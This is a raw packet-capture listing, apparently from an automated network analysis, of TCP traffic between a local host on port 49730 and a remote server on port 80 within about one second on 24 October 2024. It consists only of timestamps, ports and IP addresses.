Oct 24, 2024 19:29:18.369062901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369081974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369095087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369102955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369107008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369121075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369132042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369132996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369146109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369162083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369180918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369185925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369229078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369251966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369266987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369277000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369288921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369290113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369302988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369318962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369347095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369409084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369421005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369431973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369445086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369457006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369461060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369468927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369502068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369560957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369573116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369584084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369596958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369609118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369621038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369630098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369666100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369685888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369685888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369694948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369762897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369776964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369790077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369801044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369803905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369831085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369858027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.369976997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.369990110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370001078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370012045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370031118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370035887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370043039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370049953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370075941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370086908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370090008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370100021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370111942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370112896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370141983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370165110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370327950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370341063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370351076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370362997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370373964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370382071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370385885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370398045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370407104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370409012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370423079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370424986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370434999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370443106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370449066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370461941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370476961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370506048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370706081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370718956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370728970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370739937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370749950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370750904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370764017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370774984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370779037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370786905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370798111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370805979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370810032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370821953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370831013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370834112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370841980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370847940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370861053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370872021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370872974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.370903015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.370912075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371093988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371107101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371117115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371129036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371140957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371141911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371151924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371153116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371166945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371176004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371187925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371196985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371205091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371220112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371228933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371262074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371303082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371324062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371370077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371381998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371411085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371428013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371438026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371468067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371481895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371493101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371505022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371515989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371527910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371529102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371540070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371543884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371552944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371563911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371565104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371577978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371577978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371589899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371592045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371623039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371648073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371861935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371874094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371885061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371896982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371908903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371912003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371920109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371923923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371932983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371943951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371954918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371956110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371967077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371978045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.371980906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.371990919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.372021914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.418625116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.418642998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.418656111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.418700933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.418740988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.485946894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.485966921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.485980034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486031055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486071110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486458063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486490011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486505032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486514091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486516953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486527920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486531019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486546040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486547947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486558914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486583948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486839056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486897945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486910105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486941099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486958981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.486985922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.486998081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487009048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487020016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487036943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487061977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487206936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487221003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487232924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487272024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487297058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487440109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487524033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487535000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487566948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487580061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487590075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487602949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487613916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487643957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487668991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487700939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487711906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487723112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487737894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487749100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487782955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487859011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487870932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487880945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487891912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487900019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487904072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487917900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487934113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487940073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487946987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487958908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.487961054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.487982035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488003016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488152981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488162994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488173008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488183975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488195896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488199949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488208055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488218069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488219976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488228083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488249063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488277912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488312006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488325119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488334894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488348007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488363028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488387108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488573074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488584042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488594055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488605022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488615990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488616943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488630056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488641977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488645077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488655090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488666058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488666058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488697052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488698959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488709927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488718033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488722086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488735914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488745928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488748074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488759995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488770962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488776922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488785982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488797903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.488799095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488817930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488852024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.488995075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489005089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489048958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489084959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489098072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489109993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489120960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489124060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489134073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489145994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489155054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489187956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489253044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489264011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489286900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489298105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489305019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489310026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489322901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489326000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489336014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489356041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489384890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489586115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489598989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489609003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489622116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489628077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489633083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489634991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489645004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489654064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489655972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489670038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489679098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489691019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489705086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489717007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489940882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489963055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489974022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489984989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.489984989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.489996910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490003109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490009069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490021944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490034103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490036011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490044117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490055084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490065098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490071058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490076065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490087032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490094900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.490098000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.490109921 CEST	80	49730	185.215.113.37	192.168.2.4
